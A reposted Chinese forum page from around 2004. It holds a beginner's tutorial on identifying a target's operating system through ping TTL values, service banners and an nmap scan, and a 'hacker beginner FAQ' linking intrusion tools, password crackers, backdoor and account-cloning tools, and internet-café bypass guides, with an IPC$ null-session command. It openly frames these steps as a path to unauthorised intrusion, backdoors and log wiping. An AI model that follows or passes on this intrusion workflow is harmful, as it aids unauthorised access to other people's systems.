张须陀手下将领:黑客对系统识别的基本方法-

来源:百度文库 编辑:中财网 时间:2024/05/13 08:10:33
对操作系统的认识,对于每一个从事计算行业的人都是非常重要,要成为一名黑客更是要对操作系统有深入、深刻的认识。下面就和大家一起来探讨一下这方面的问题。 
我们先来看分析一下一个黑客入侵的基本过程:1、判断入侵对象的操作系统—>2、描扫端口,判断开放了那些服务(这两步有可能同时进行)—>3、跟据操作系统和所开放的服务选择入侵方法,通常有“溢出”和“弱口猜测”两种方法—>4、获得系统的最高权力—>5、安放后门、清除日志走人( :)也许有格盘走人的)。 
由上面可以知道,在整个过程当中对操作系统类型的判断识别是最基本也是很关系的一步。可想而知,如果你连对方的操作系统是什么都不知道,要想入侵跟本无从谈起。 
也许很少人问过自己,我们为什么要先了解对方的操作系统呢?其实,我们了解操作系统的原因是因为我们要了解系统内存的工作况态,了解它是以什么方式,基于什么样的技术来控制内存,以及怎么样来处理输入与输出的数据的。世上任何东西都不可能是尽善尽美的(当然这也是我们人类不断追求的动力所在),作为复杂的计算机系统更如此,它在控制内存与处理数据的过程中总是有可能出错的(特别是在安装了其它的应用程序以后),系统本身也会存在各种各样的弱点与不足之处。黑客之所以能够入侵,就是利用了这些弱点与错误。现在网上流行的各种各样的入侵工具,都是黑客在分析了系统的弱点及存在的错之后编写出来的。(其中以“缓冲区溢出”最为常见) 
作为一般的黑客,我们只要善于使用现成的入侵工具,就可以达到我们入侵的目的。但是因为不同的系统,其工作原理不一样,所以不同的入侵工具只能针对相应的操作系统。因此,对操作系统的识别是必不可少的,这就需要我们对操作系统有相当的了解,对网络有一定的基础识(要作黑客还是不那么容易的),关于各类操作系统的介绍,在网上有成堆的文章,大家可以自己去查阅。 
在此介绍一此简单的操作系统识别方法给大家,希望对大家有用。 
一、用ping来识别操作系统 
C:\>ping 10.1.1.2 

 


Pinging 10.1.1.2 with 32 bytes of data: 


Reply from 10.1.1.2: bytes=32 time<10ms TTL=128 
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128 
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128 
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128 


Ping statistics for 10.1.1.2: 
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 
Approximate round trip times in milli-seconds: 
Minimum = 0ms, Maximum = 0ms, Average = 0ms 


C:\> 
C:\>ping 10.1.1.6 


Pinging 10.1.1.6 with 32 bytes of data: 


Request timed out. 
Reply from 10.1.1.6: bytes=32 time=250ms TTL=237 
Reply from 10.1.1.6: bytes=32 time=234ms TTL=237 
Reply from 10.1.1.6: bytes=32 time=234ms TTL=237 


Ping statistics for 10.1.1.6: 
Packets: Sent = 4, Received = 3, Lost = 1 (25% loss), 
Approximate round trip times in milli-seconds: 
Minimum = 234ms, Maximum = 250ms, Average = 179ms 
我们跟据ICMP报文的TTL的值,我们就可以大概知道主机的类型。如:TTL=125左右的主机应该是windows系列的机子,TTL=235左右的主机应该是UINX系列的机子。如上面的两个例子,10.1.1.2就是win2000的机子,而10.1.1.6则是UINX(Sunos 5.8)的机子。这是因为不同操作系统的机子对ICMP报文的处理与应答是有所不同的,TTL值每过一个路由器会减1。所以造成了TTL回复值的不同。对于TTL值与操作系统类型的对应,还要靠大家平时多注意观察和积累。 
二、直接通过联接端口根据其返回的信息来判操作系统 
这种方法应该说是用得最多的一种方法,下面我们来看几个实例。 
1、如果机子开了80端口,我们可以telnet(当然如果有NC最好用NC,它可以不用盲打)它的80端口。 
Microsoft Windows 2000 [Version 5.00.2195] 
(C) 版权所有 1985-1998 Microsoft Corp. 


C:\>telnet 10.1.1.2 80 
输入get 回车(注意这里是盲打) 
如果返回, 
HTTP/1.1 400 Bad Request 
Server: Microsoft-IIS/5.0 
Date: Fri, 11 Jul 2003 02:31:55 GMT 
Content-Type: text/html 
Content-Length: 87 


ErrorThe parameter is incorrect.  
 


遗失对主机的连接。 
C:\> 
那么这台就肯定是windows的机子。 
如果返回, 
  501 Method <br>Not Implemented  

Method Not Implemented

 get to / not 
supported.

 Invalid method in request get


 
Apache/1.3.27 Server at gosiuniversity.com Port 80
 
 
遗失对主机的连接。 
C:\> 
那么多数就是UINX系统的机子了。 
2、如果机子开了21端口,我们可以直接FTP上去 
C:\>ftp 10.1.1.2 
如果返回, 
Connected to 10.1.1.2. 
220 sgyyq-c43s950 Microsoft FTP Service (Version 5.0). 
User (10.1.1.2none)): 
那么这就肯定是一台win2000的机子了,我们还可以知道主机名呢,主机名就是sgyyq-c43s950。这个FTP是windows的IIS自带的一个FTP服务器。 
如果返回, 
Connected to 10.1.1.3. 
220 Serv-U FTP Server v4.0 for WinSock ready... 
User (10.1.1.3none)): 
也可以肯定它是windows的机子,因为Serv-U FTP是一个专为windows平台开发的FTP服务器。 
如果返回, 
Connected to 10.1.1.3. 
220 ready, dude (vsFTPd 1.1.0: beat me, break me) 
User (10.1.1.3none)): 
那么这就是一台UINX的机子了。 
3、如果开了23端口,这个就简单了,直接telnet上去。 
如果返回, 
Microsoft (R) Windows (TM) Version 5.00 (Build 2195) 
Welcome to Microsoft Telnet Service 
Telnet Server Build 5.00.99201.1 
login: 
那么这肯定是一台windows的机子了 
如果返回, 
SunOS 5.8 
login: 
不用说了,这当然是一台UINX的机子了,并且版本是SunOS 5.8的。 
三、利用专门的软件来识别 
这种有识别操作系统功能的软件,多数采用的是操作系统协议栈识别技术。这是因为不同的厂家在编写自己操作系统时,TCP/IP协议虽然是统一的,但对TCP/IP协议栈是没有做统一的规定的,厂家可以按自己的要求来编写TCP/IP协议栈,从而造成了操作系统之间协议栈的不同。因此我们可以通过分析协议栈的不同来区分不同的操作系统,只要建立起协议栈与操作系统对应的数据库,我们就可以准确的识别操作系统了。目前来说,用这种技术识别操作系统是最准确,也是最科学的。因此也被称为识别操作系统的“指纹技术”。当然识别的能力与准确性,就要看各软件的数据库建立情况了。 
下面是简单介绍两款有识别功能的软件。 
1、 著名的nmap,它采用的是主动式探测,探测时会主动向目标系统发送探测包,根据目标目标机回应的数据包来,叛断对方机的操作系统。用法如下: 
F:\nmap>nmap -vv -sS -O 10.1.1.5 


Starting nmap V. 3.00 (  ) 
Host IS~123456ADCD (10.1.1.5) appears to be up ... good. 
Initiating SYN Stealth Scan against IS~123456ADCD (10.1.1.5) 
Adding open port 139/tcp 
Adding open port 7070/tcp 
Adding open port 554/tcp 
Adding open port 23/tcp 
Adding open port 1025/tcp 
Adding open port 8080/tcp 
Adding open port 21/tcp 
Adding open port 5050/tcp 
Adding open port 9090/tcp 
Adding open port 443/tcp 
Adding open port 135/tcp 
Adding open port 1031/tcp 
Adding open port 3372/tcp 
Adding open port 25/tcp 
Adding open port 1433/tcp 
Adding open port 3389/tcp 
Adding open port 445/tcp 
Adding open port 80/tcp 
The SYN Stealth Scan took 1 second to scan 1601 ports. 
For OSScan assuming that port 21 is open and port 1 is closed and neither ar 
rewalled 
Interesting ports on IS~123456ADCD (10.1.1.5): 
(The 1583 ports scanned but not shown below are in state: closed) 
Port State Service 
21/tcp open ftp 
23/tcp open telnet 
25/tcp open smtp 
80/tcp open http 
135/tcp open loc-srv 
139/tcp open netbios-ssn 
443/tcp open https 
445/tcp open microsoft-ds 
554/tcp open rtsp 
1025/tcp open NFS-or-IIS 
1031/tcp open iad2 
1433/tcp open ms-sql-s 
3372/tcp open msdtc 
3389/tcp open ms-term-serv 
5050/tcp open mmcc 
7070/tcp open realserver 
8080/tcp open http-proxy 
9090/tcp open zeus-admin 
Remote operating system guess: Windows 2000/XP/ME 
OS Fingerprint: 
TSeq(Class=RI%gcd=1%SI=21F8%IPID=I%TS=0) 
T1(Resp=Y%DF=Y%W=FAF0%ACK=S++%Flags=AS%Ops=MNWNNT) 
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=) 
T3(Resp=Y%DF=Y%W=FAF0%ACK=S++%Flags=AS%Ops=MNWNNT) 
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=) 
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=) 
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=) 
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=) 
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RIPCK=E%UCK=E%ULEN=134%DAT=E) 


TCP Sequence Prediction: Class=random positive increments 
Difficulty=8696 (Worthy challenge) 
TCP ISN Seq. Numbers: 5B9022E2 5B914E12 5B92A495 5B93915A 5B94A9B5 5B95CC64 
IPID Sequence Generation: Incremental 


Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds 


其中 Remote operating system guess: Windows 2000/XP/ME 这行就是NMAP对操作系统类型的判断。还返回了好多信息,NMAP不愧为扫描之王。(哈哈,黑客必备哦!) 
2、 天眼,采用的是被动式的探测方法。不向目标系统发送数据包,只是被动地探测网络上的通信数据,通过分析这些数据来判断操作系统的类型。配合supersan使用,较果很好。 
具体的使用方法,在此就不具体介绍了。有兴趣的的朋友可以到网上搜一下关于天眼使用方法的文章,会有很多的。 
以上讲解了一些对操作系统识别的基本方法,希望对初学者有用。由于本人水平有限,不当之处,还请高手斧正!

新塘新世界花园业主论坛:http://gz.focus.cn/msglist/23465
原帖链接 http://gz.focus.cn/msgview/23465/16354924.html

缘煦的签名档

I AM TURE COLOR MAN       

缘煦

缘煦

个人积分:0

个人官职:论坛庶民

帖子总数:164

图片总数:0

官职:论坛庶民 500 个人中心 我的博客
发短消息我的帖子

黑客安全技术入门常见问题集! (点击:1187)

缘煦 发表于 新塘新世界花园论坛 2004-08-13 20:03:58

【1楼】 前言

续写这篇文章的原因很简单,因为ZZZEVAZZZ前辈写的可能因为时间的关系大部份地址以经失效。为了方便大家所以续写了这篇,希望对大家有所帮助。全文大部份延用ZZZEVAZZZ前辈的“新手常见问题总结性回答”以下所提供地址均经地测试决对可用。

很早就想总结一下新手常见的问题和回答了。因为我也是一个新手,很希望有一份适合自己的问题总结,但是前辈以经做了整理。<灰色轨迹>的zzzevazzz写的“新手常问题总结性回答”相信大家都以经看过了.最近又回顾了一下,发现很多文章都以经不存在了.所以抽出一点时间重新整理了一下,加入一些自己的看法,更多是参照前

辈的作品,也是为了方便大家,因为现在大部的网站你要是想找到点什么资料就要不停的注册,添表,真是烦死了

(在这里也劝各位喜欢让别人注册的朋友,提高注册人数说明不了任何问题,强行让大家注册,只能招来反感

,请各位站长行行好,把游客浏览开放。好了,希望这篇文章能对大家有所帮助.也希望不要在出现大量的重复

问题.更加希望大家都能一起进步,网站能越办越好,能成为大家心目中的第六空间(一个属于我们大家的空间).

由于本人水平有限,下面的表述有错误和不足的地方,还请各位高手指点。如果大家有什么建议也请发短消息

或跟帖告诉我。不过不要对我要求太高,因为我是个新手,一个菜鸟都算不上的人.我只能算是一个网络安全的爱

好者.好了.下面正式开始:

第一章------关于找软件

常用类软件:
华军软件 http://www.newhua.com/ (根据物理位置自行选择速度快的镜像)
中国下载 http://download.com.cn/ (使用查找功能可找到大部份软件)
东丽在线 http://www.tjdl.net/softdown/ (不错的软件下载站,类似华军)
世纪下载 http://www.21sx.com/ (也是一个不错的下载站)
安全类软件:
安全焦点 http://www.xfocus.net/tool.php
安全资讯 http://www.aurorasafe.com/list.asp
天天安全 http://www.ttian.net/download/list.php
网嗅下载 http://netsill.com/download/default.asp
灰色轨迹 http://www.sandflee.net/down/list.asp
鹰派下载 http://211.155.27.112/~technic/down/
(一些大型精典安全软件下载,不过有时候就上不去)


找代理在这里:
代理使用方法 http://extend.hk.hi.cn/~sunbird/freeproxy_why.html
(各种代理使用方法介绍)
代理服务器地址 http://www.salala.com/proxy_index.htm
(每日更新的,大部份是HTTP代理)
代理服务器地址 http://www.emaga.net/8341/myann
(每日更新的,大部份是SOCKS代理,既QQ代理)



注册码在这里:
第六空间 http://www.sixthroom.com/down/qt/ser.rar (注册码大全下载)
注册码搜索 http://www.netpaste.com/code/
孤月注册码 http://www.guyue.com/key/

第二章------关于被入侵


简单说明:
经常有帖子说:“我中木马啦,怎么办?”、“我被攻击了”,“我的windows有问题,是不是被入侵啦?

”等等。哪么如果你怀疑系统被入侵的话,请你首先看看日志的记录或是有什么变化,然后你应该查看可疑进

程(win98需要用相关工具)、注册表启动项、服务、开放端口等,然后更新病毒库,杀毒。前提是你要有一定

的电脑常识并对你的系统比较了解,才能分别正常与否。如果你自己对电脑一窍不通,那在论坛别人也很难帮

助你。其实就像对付现实中的病毒一样,应该预防为主。杀毒软件和网络防火墙可以抵御绝大部分危险,自身

安全知识的提高则是最根本的保障。最新的病毒相关知识可以到杀毒软件公司的主页上找。另外,系统不正常

也可能是xx作失误引起的。这里不是“电脑零起点”,所以关于系统修复的问题,请不要在论坛提了。


相关工具:

Active Ports 监视自己电脑的端口,并做出相应处理。http://www.sixthroom.com/down/aq/cn_aports.rar
windows优化大师5.1 它的进程管理功能不错。更是目前最好的系统优化软件。

http://www.sixthroom.com/down/aq/wom.rar
Windows 基准安全分析器 1.0 (特别推荐,详细资料看下载说明吧)
http://www.sixthroom.com/down/admin/aq/mbsasetup.msi
Fport-2.0 查看端口关联的进程 (应用于9x/me)http://www.sixthroom.com/down/admin/aq/fport.zip
mport 比fport更胜一筹的工具 http://www.sixthroom.com/down/admin/aq/mport.zip
KV3000江民杀毒王(正式版+钥匙盘)
http://www.kxweb.net/down/down.asp?downid=1&id=14
金山毒霸2003正式版
http://www.kxweb.net/down/down.asp?downid=1&id=11


相关资料:

104种木马的清除方法http://asp2.6to23.com/ebug88/net/article/net004.htm
清除恶意网页的破坏 http://assistant.3721.com/safe.htm
2000系统进程总列表 http://sinbad.zhoubin.com/read.html?board=Win&num=73
木马的检测、清除及其预防 天网安全检测 http://sky.net.cn/main/view.php?cid=170
蓝盾安全检测 http://www.bluedon.com/bluedonserver.asp


第三章------基础知识和入侵步骤


简单说明:
电脑和网络知识可算是做黑客的基础的基础,至少你要先了解了它们再来看下面的文章。看完这部分的文章,

你也只是算站到了门口,路还长着呢。这里我再多说几句关于入侵步骤的话,给新手做个引导。所谓入侵,可

以理解为未授权的访问。既然是未授权的,就需要借助一些非常规的手段,即通常所说的利用漏洞。
基础知识网址:
http://tech.163.com/tm/010213/010213_14563.html
http://tech.163.com/tm/010213/010213_14564.html
http://tech.163.com/tm/010214/010214_14632.html
http://tech.163.com/tm/010214/010214_14634.html
http://tech.163.com/tm/010214/010214_14638.html

一、要利用漏洞首先要发现它。端口扫描和漏洞扫描就是“敲门砖”。可以对大量目标做一般扫描,也可以对

单一目标做重点扫描。或者两者结合。当你对漏洞熟悉时,你可以只通过端口扫描就能了解目标的可能有的漏

洞。这样既提高效率又不易被记录日志。
几种扫描器的简单使用教程:http://www.chinesehack.org/file/show.asp?id=5614
入侵技术介绍——目标探测:http://www.sixthroom.com/ailan/f ... mp;RootID=279&I

D=279

二、找到漏洞后的利用问题,是千差万别的。这正是新手学要学习的地方之一。很多要依靠自己的知识积累及

对系统的掌握及熟悉程度,这里就不多说了。 下面提供几个提供漏洞资料的网站供大家参考。
天极网 http://www.myhard.com/76284138209935360/index.shtml
绿盟科技 http://www.nsfocus.net/index.php?act=sec_bug
五月安全网 http://bgbbs.www70.cn4e.com/article.asp?cat_id=2
中国信息安全 http://www.chinafirst.org.cn/ruodian/advisory.php

三、利用漏洞的目的是什么呢?是控制对方,即是获得远程shell。shell这个概念是从UNIX下继承过来的,是

指与xx作系统核心的一种交互方式和界面。典型的例子是telnet。得到shell的办法有很多种,比如通过系统自

带的telnet,终端服务。或者用木马和工具提供的,如winshell,冰河等等。以下介绍两篇SHELL编程的文章给

大家。
中国软件 http://www.csdn.net/develop/article/14/14219.shtm
程序春秋 http://www.cbinews.com/developer/showcontent.php?articleid=2193

四、shell是有权限差别的。最高权限——管理员权限才是我们的目标。所以有时会有提升权限的问题。当然,

这也是利用了漏洞。以下介绍几篇文章。
Win2K 提升权限漏洞
http://www.yesky.com/20010530/182273.shtml
Microsoft SQL Server Webtasks权限提升漏洞
http://it.rising.com.cn/newSite/ ... 10/31-153502052.htm
Linux kernel ptrace提升权限漏洞
http://levinstorm.myetang.com/main/holes/unix/005.html
NT/2000提升权限的方法小结
http://home.lufeng.net/wolf/Computer/luodong/2000tisheng.htm
IIS提升权限漏洞
http://www.ddhome.net/hole/14.htm

五、有了shell还要扩大它,就是进一步获得更好用的shell。命令行的到图形的、功能少的到多的。于是才有

了“怎么开3389”,“怎么上传”之类问题。在这介绍给大家介绍一下现在最流行的3389吧。更多的文章请到w

ww.sixthroom.com。
远程开启3389终端服务
http://www.sandflee.net/wawa/3389-1.htm
建立你的3389肉鸡
http://www.sandflee.net/wawa/sz-3389.htm

六、为了下次还能控制目标,你需要保持shell。做一个好的后门又是一种“学问”。克隆帐号、埋木马、破ad

ministrator的密码,手段不一而足。各位慢慢学吧。
永远的后门 http://www.ttian.net/article/show.php?id=259
Win2000 下Ping 后门的简单实现
http://www.landun.org/wenzhang/images/xiaoran/article/154.html
帐号克隆
http://www.netXeyes.org/CA.exe
帐号检查
http://www.netXeyes.org/CCA.exe
暴力破解LC4
http://www.andyxu.net/banana/tools_2/lc4.rar

端口知识介绍:
相关工具:
扫描端口是扫描器的基本功能,工具太多了。提供两个给大家,更多的参看后面。
X-Port.zip下载 http://www.xfocus.net/download.php?id=327
PortReady下载 http://dotpot.533.net/dpsoft/PortReady1.6.zip
相关资料:
端口扫描简介 http://www.netscreen.com.cn/suml/zhishiyy/jingong/duankougj.htm0
系统服务及木马默认端口表
http://www.pttc.yn.cninfo.net/dtsy/nettech/netanquan/41250634.htm
端口大全 http://www.sixthroom.com/ailan/f ... otID=268&ID=268
常用默认端口列表及功能中文注解

http://www.sixthroom.com/ailan/f ... otID=267&ID=267
常见端口详解及部分攻击策略

http://www.sixthroom.com/ailan/f ... otID=266&ID=266

相关资料:
如何成为一名黑客 http://263.aka.org.cn/Docs/hacker-howto_2001.html
提问的技巧

http://bbs.online.sh.cn/eliteart ... a344fb3b6efa4377e48

ae
TCP/IP基础 http://www.linkwan.com/gb/routertech/netbase/tcpip.htm
网络攻防教程 http://www.netsill.com/wenzhang/list.asp?id=115
网络入侵步骤及思路 http://www.iamguo.com/bh3/hackguide2.htm
拒绝背后黑手的窥探 IPC$漏洞大揭秘
http://computer.szptt.net.cn/2002-04-27/nw2002042700109.shtml
全球ip分配表 http://519519.vicp.net/lb5000//usr/3/3_11.txt
黑客入门教程 http://www.pttc.yn.cninfo.net/dtsy/nettech/netanquan/43934529.htm
菜鸟XXX客快速入门
http://netsafe.ayinfo.ha.cn/sqxw/2002117172333.htm
几种流行的入侵工具与讲解
http://www.pttc.yn.cninfo.net/dtsy/nettech/netanquan/44188520.htm
常见端口详解及部分攻击策略
http://www.pttc.yn.cninfo.net/dtsy/nettech/netanquan/-90637.htm
攻击的各种级别
http://www.pttc.yn.cninfo.net/dtsy/nettech/netanquan/39825935.htm
新塘新世界花园业主论坛:http://gz.focus.cn/msglist/23465
原帖链接 http://gz.focus.cn/msgview/23465/16354947.html

缘煦的签名档

I AM TURE COLOR MAN       

缘煦

缘煦

个人积分:0

个人官职:论坛庶民

帖子总数:164

图片总数:0

官职:论坛庶民 500 个人中心 我的博客
发短消息我的帖子

黑客安全技术入门常见问题集! (点击:1464)

缘煦 发表于 新塘新世界花园论坛 2004-08-13 20:05:00

【2楼】 第四章------关于命令的使用

简单说明:
windowsNT/2000下有丰富的cmd可供使用,其作用也是巨大的。完全值得去熟练掌握她它们。windows2000本身

就提供了详细的命令帮助。在开始菜单--》帮助中可以搜索到“windows 2000 命令参考”。强烈建议各位新手

花些时间仔细看一遍。装了比如IIS等软件,就会有新的命令(iisreset),在命令行方式下加/?或-h参数可以

查看帮助,其他内置的命令当然也可以。还有就是掌握一些常用的DOS命令也是非常有必要的。因为WINSOWS不

管发展到哪一天,它也都不可能取代DOS,至少现在还不行。NET命令更是最常用的网络命令,想做一个黑客,

更是你所必需掌握的。掌握一些LINUX命令也是很有必要的。希望下面的资料对大家有所帮助。

相关帖子:
DOS下常用网络相关命令解释
http://www.jiejingwang.com/list.asp?id=521
入门网络命令
http://www.jiejingwang.com/list.asp?id=520
Win2000命令全集 http://www.sixthroom.com/ailan/f ... otID=343&ID=343
Windows XP下cmd命令详解

http://www.sixthroom.com/ailan/f ... otID=366&ID=366
ftp命令: http://www.hotcy.org/chem/campous/article/ftp.htm
telnet命令简介:http://www22.brinkster.com/lastknife/netbase/telnetorder.htm (以上地址简单介绍了

TELNET命令,http://www.sixthroom.com/ailan/f ... otID=277&ID=277
net命令基本用法:http://www.yy0730.com/1/1/1/wen/list.asp?id=12
tftp命令: 由于TFTP命令过于简单,请自行使用“TFTP /?”进行查询。下面在给出一个参照的
实例:http://levinstorm.myetang.com/main/tutorials/hacking/006.html
一般入侵所需要的几个常用命令:
http://www.yixindz.com/badschool/hacker/hack_commands.htm
Linux 的常用网络命令
http://www.jiejingwang.com/list.asp?id=522


第五章------关于windows98


简单说明:
这类问题有两种:一是怎样入侵win98系统,二是在win98怎样入侵。
由于98的网络功能并不完善,使得问题的解决远没有像对2000那样“丰富多采”。98默认没有什么网络服务启

动,众所周知漏洞是由于各种服务的功能设计并不完美,所以才产生的,也就是说没有漏洞也就很难入侵,找不到

什么可利用的漏洞。这给入侵带来的困难是难以想像的.共享入侵,算是最常见的攻击方式了。

相关资料:
共享入侵 http://www.sixthroom.com/ailan/f ... otID=269&ID=269
入侵windows98系统 http://www.sixthroom.com/ailan/f ... otID=270&ID=270
win98入侵网吧详解 http://www.sixthroom.com/ailan/f ... otID=271&ID=271

其实还有些方法,比如嗅探密码、发病毒和木马到信箱、甚至用QQ“联络感情”再传个绑木马的Flash等,没什

么意思,就此打住(这是前辈说的,他老人家都说打住了,哪我也打住,其实是我也不知道说什么,呵呵)。
基于同样的理由,98不是一个好的攻击平台。如果只是端口扫描,那么superscan可以胜任。web类的漏洞扫描x

-scan也可以。但涉及ipc$的弱口令、漏洞、远程控制工具以及连接一些服务(如sql)就要“基于NT技术构建

”的os了。好在3389终端服务的客户端可以是98,所以先搞一台开3389的肉鸡就算是回避了问题。如果你还在

用98,诚恳的建议你:请用2000。如果你在网吧,先试试入侵网吧服务器。(在这里我也要加一句就是如果你

是用98系统的话,哪么选择榕哥的流光98版也是不错的。不过有很多功能也还是无法使用)。
鉴于98的问题技术含量不高、没有深入探讨价值,所以就谈到这里吧。(个人观点)

相关工具:
简单说明:因为前辈的软件都是给出的黑白网络的地址,现在黑白关站了(好像是星坤自己买了服务器就还会

开),所以地址大多失效了,在这里我重新做一下整理,所有软件均测试可下。
NetPass 1.0 破解98共享密码 http://lovezxd.myetang.com/indexpage/indextool/NetPass.zip
cain v2.5 综合破解工具 http://www.qq888.com/down/download.asp?Did=968
exeBinderZ 1.3 EXE捆绑机 http://www.heibai.net/download/show.php?id=3028&down=3
SUPERSCAN3.0中文版下载

http://download.pchome.net/php/d ... anv30.exe&svr=3
X-SCAN2.3下载 http://www.xfocus.net/download.php?id=366
流光98下载 http://www.netxeyes.com/cfluxay2k1for98setup.exe(因榕哥不愿意看到加了补丁的作品,为了

尊重他老人家,所以这里不提供补丁下载,需要的就自己去找吧)。
终端服务客户端 http://arm.533.net/hack/winterminal.zip (既3389连接器)


第六章------关于破解邮箱

简单说明:
现在破解邮箱的贴子以经不是很多,至少比前半年少了很多了,但是还是有,所以就给出下面一点资料,希望

能帮到大家。偷看别人信件是违法行为,请不要偷看他人信件,如果想掌握技术的话,哪你可以自己解自己的

邮箱,这样既掌握了技术,又不会有人找你麻烦。

相关工具:
溯雪 http://www.netxeyes.org/dansnowb7setup.exe
溯雪中文补丁 http://www.netxeyes.org/dansnowb7_cn.zip (先安装英文版,释放到原英文版目录即可)

相关资料:
溯雪教程 http://1123.myrice.com/jiao9/j1095.htm
溯雪破解21cn信箱的完整教程 http://www.521hacker.com/download/show.php?id=1263&down=2


第七章------关于解除网吧、网页限制


简单说明:
现在关于网吧破解,网页限制破解的贴子正好和破解邮箱的相反,越来越多,各种管理软件也是层出不穷,可

是自古以来就是道高一尺,魔高一丈,下面的资料供大家参考吧。记住不要太过份:

三招破解禁用鼠标右键的网站:

http://www.sixthroom.com/ailan/f ... otID=272&ID=272
破解硬盘还原卡: http://www.sixthroom.com/ailan/f ... otID=273&ID=273
破解硬盘还原卡:http://www.sixthroom.com/ailan/f ... otID=274&ID=274
网吧封锁权限破解:http://www.sixthroom.com/ailan/f ... otID=275&ID=275
破解美屏: http://tty.yyun.net/wenzh/youjian/21.htm#MAILLISTDOC22
破解网吧限制:http://www.21up.net/bbs/plugins/netbar.html
在线破解网吧限制:http://webmaster.diy.163.com/cy07
万象破解,网吧入侵:http://club.6to23.com/389/show.asp?t=389&ti=8733

相关工具:
网吧幽灵1.8下载
http://61.159.224.188/makesoftur ... 6F62707C6C696B62677
美屏破解:http://members.xoom.virgilio.it/baikaixin/mppj.exe
多种网吧限制破解软件下载:http://webmaster.diy.163.com/cy07


第八章------关于流光

简单说明:
流光实在是个十分出色的综合工具。是国人的骄傲。还没用过的立刻下载一个装上,自己体验一下吧。使用前

建议看看自带的说明。 (不过个人看法,新手最好不要使用流光,因为它的强大会让你变的懒惰。)
下载地址:
流光4.7 http://www.netxeyes.org/fluxay47/fluxay47build3200setup.exe
流光98下载 http://www.netxeyes.com/cfluxay2k1for98setup.exe

相关资料:
流光教程初始篇FAQ http://www.sixthroom.com/ailan/f ... otID=276&ID=276
流光教程一 http://www.hackerstart.myetang.com/jiaocheng/liuguang1.htm
流光教程二 http://www.hackerstart.myetang.com/jiaocheng/liuguang2.htm
流光教程三 http://www.hackerstart.myetang.com/jiaocheng/liuguang3.htm
流光教程四 http://www.hackerstart.myetang.com/jiaocheng/liuguang4.htm
流光教程五 http://www.hackerstart.myetang.com/jiaocheng/liuguang5.htm
流光教程终结篇 http://www.hackerstart.myetang.com/jiaocheng/liuguangover.htm


常见问题回答:
1,我下载的流光杀毒软件说有病毒,怎么会事?
答:一些杀毒软件的确认为流光是木马(谁让它这么有名呢,呵呵)。如果杀毒,流光将无法使用,所以只有

让杀毒软件停止监测。必竟要得到一些东西的时候你就要做好准备失去一去些什么。呵呵,不过没关系的,它

不会对你的系统构成任何威胁。
2,为什么有些肉鸡安装sensor失败?
答:如果拷贝文件出错,可能是因为目标admin$共享未开放。请采用其他shell,在目标主机上执行net share

admin$命令。
如果启动服务失败,可能因为使用的端口已经被占用,换个试试;也可能目标有杀毒软件删除了文件,或者有

防火墙阻止sensor连网,没有什么好的解决办法。
3,为什么一些流光扫到的密码不能用?
答:可能是误报,将扫描速度降低些再扫。对于winxp目标,也会产生误报。也可能因为你用扫到的非管理员帐

号来连接目标,请在ipc$扫描选项里将“只对administrators组进行猜解”选上。(以上一段基本全部都是前

辈说的话,没做改动。呵呵,因为目前也就有这几个共性问题,还有一点要叮嘱大家的是看看流光的帮助,仔

细的看,哪其实是最好的流光教程。)还要谢谢前辈为我们这些小鸟考虑的这么周到,连可能碰到的问题都想

到了,在这里在一次的对前辈表示感谢。


第九章------关于字典


简单说明:
xx作系统将用户和密码信息加密后存放在特定的地方和文件中。典型的如windowsNT里的sam文件和Linux里的et

c/passwd。由于加密算法是单向散列的,所以几乎不可能找到逆向算法。因此,不得不使用同样的算法加密各

种口令,将结果去吻合散列值。字典就是有选择地储存了一批口令的文件。例如生日、常用单词、中文名字的

拼音等。著名的破解密码的工具,一般自带一些字典。也可以使用字典工具制作符合要求的字典。


相关工具:
乱刀 小榕出品,破解UNIX系统的密码 http://www.netxeyes.org/bladese.exe
john 最著名的UNIX密码破解工具(windows版) http://arm.533.net/crack/john.zip
万能钥匙 http://arm.533.net/crack/xkey.zip
Idgwin下载 http://secrecy.ayinfo.ha.cn/hack/dict/idgwin.zip(字典智能生成器(并非随机生成))。
xkeyset下载 http://secrecy.ayinfo.ha.cn/hack/dict/xkeyset.exe(造字典工具中的精品,根据你的需要一

步步提示生成字典。)
LC4超管密码破解软件( 注册版)http://www.51299.com/OICQ/2002/b05/25/lc4setup.zip
乱刀中集成了榕哥的大作“黑客字典III”感兴趣的朋友可以试试!


第十章------关于ipc$、空连接和默认共享

简单说明:
******首先需要指出的是空连接和ipc$是不同的概念。空连接是在没有信任的情况下与服务器建立的会话,换

句话说,它是一个到服务器的匿名访问。ipc$是为了让进程间通信而开放的命名管道,可以通过验证用户名和

密码获得相应的权限。有许多的工具必须用到ipc$。默认共享是为了方便远程管理而开放的共享,包含了所有

的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。******个人认为这段很重要,因为很多人

根本就不知道什么是空连接什么是IPC$.建议不知道的朋友仔细看一下吧.这种问题,不应该不知道的.


相关帖子:
拒绝背后黑手的窥探 IPC$漏洞大揭秘
http://www.sixthroom.com/ailan/f ... otID=281&ID=281
IPC入侵全攻略 http://www.sixthroom.com/ailan/f ... otID=278&ID=278
win2k中C驱等的默认共享是怎么回事
http://www.sixthroom.com/ailan/f ... otID=282&ID=282
取消默认共享≠安全 http://js00.51.net/23/wudi/show. ... p;id=20021017212524


常见问题和回答:
一、怎样建立空连接,它有什么用?
答:使用命令 net use \\IP\ipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。
对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权限的共享,访问小部分注

册表等,没有什么利用价值。对2000作用就更小了。而且实现也不方便,需借助工具。如果你不理解“没用”

的东西为什么还会存在,就看看“专业”的解释吧:
在NT/2000下的空连接 http://www.sixthroom.com/ailan/f ... otID=280&ID=280
解剖WIN2K下的空会话 http://www.sixthroom.com/ailan/f ... otID=283&ID=283
二、为什么我连不上IPC$?
